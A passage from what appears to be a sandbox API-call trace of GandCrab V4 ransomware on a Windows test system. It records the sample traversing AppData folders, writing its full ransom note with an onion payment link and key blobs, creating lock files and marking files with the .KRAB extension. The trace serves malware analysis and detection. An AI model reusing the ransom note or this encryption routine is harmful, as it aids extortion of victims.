lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0076.138] FindClose (in: hFindFile=0x10238b8 | out: hFindFile=0x10238b8) returned 1 [0076.138] CloseHandle (hObject=0x420) returned 1 [0076.139] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.139] lstrcmpW (lpString1="Vault", lpString2=".") returned 1 [0076.139] lstrcmpW (lpString1="Vault", lpString2="..") returned 1 [0076.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Vault" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault" [0076.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\" [0076.139] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.139] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.140] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.140] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.140] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\\\KRAB-DECRYPT.txt") returned 71 [0076.140] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\vault\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0076.161] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.161] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.162] CloseHandle (hObject=0x470) returned 1 [0076.162] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.400] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.401] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x25a)) [0076.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.401] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.401] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.401] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock") returned 77 [0076.402] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\vault\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0076.405] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.406] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.406] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\") returned 54 [0076.406] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*" [0076.406] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023178 [0076.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.406] FindNextFileW (in: hFindFile=0x1023178, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.406] FindNextFileW (in: hFindFile=0x1023178, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.406] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.406] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.406] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock" [0076.406] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.407] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0076.407] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\d2ca4a08d2ca4dee3d.lock") returned 77 [0076.407] lstrlenW (lpString=".lock") returned 5 [0076.407] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.407] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.407] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.408] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.409] FindNextFileW (in: hFindFile=0x1023178, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.409] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.409] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.409] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt" [0076.409] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.409] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt.KRAB") returned 75 [0076.409] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt") returned 70 [0076.409] lstrlenW (lpString=".txt") returned 4 [0076.409] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.425] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.425] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.425] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt") returned 70 [0076.426] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Vault\\KRAB-DECRYPT.txt") returned 70 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.426] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.426] FindNextFileW (in: hFindFile=0x1023178, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0076.426] FindClose (in: hFindFile=0x1023178 | out: hFindFile=0x1023178) returned 1 [0076.427] CloseHandle (hObject=0x470) returned 1 [0076.427] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.427] lstrcmpW (lpString1="Windows", lpString2=".") returned 1 [0076.427] lstrcmpW (lpString1="Windows", lpString2="..") returned 1 [0076.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Windows" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows" [0076.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Windows\\" [0076.427] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.428] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.428] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0076.428] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0076.428] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0076.428] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Word" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word" [0076.428] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\" [0076.428] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.428] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.429] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.429] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.429] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.429] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.429] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.429] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\\\KRAB-DECRYPT.txt") returned 70 [0076.429] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0076.430] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.430] WriteFile (in: hFile=0x470, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.431] CloseHandle (hObject=0x470) returned 1 [0076.431] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.431] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.432] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x278)) [0076.432] VirtualAlloc (lpAddress=0x0, 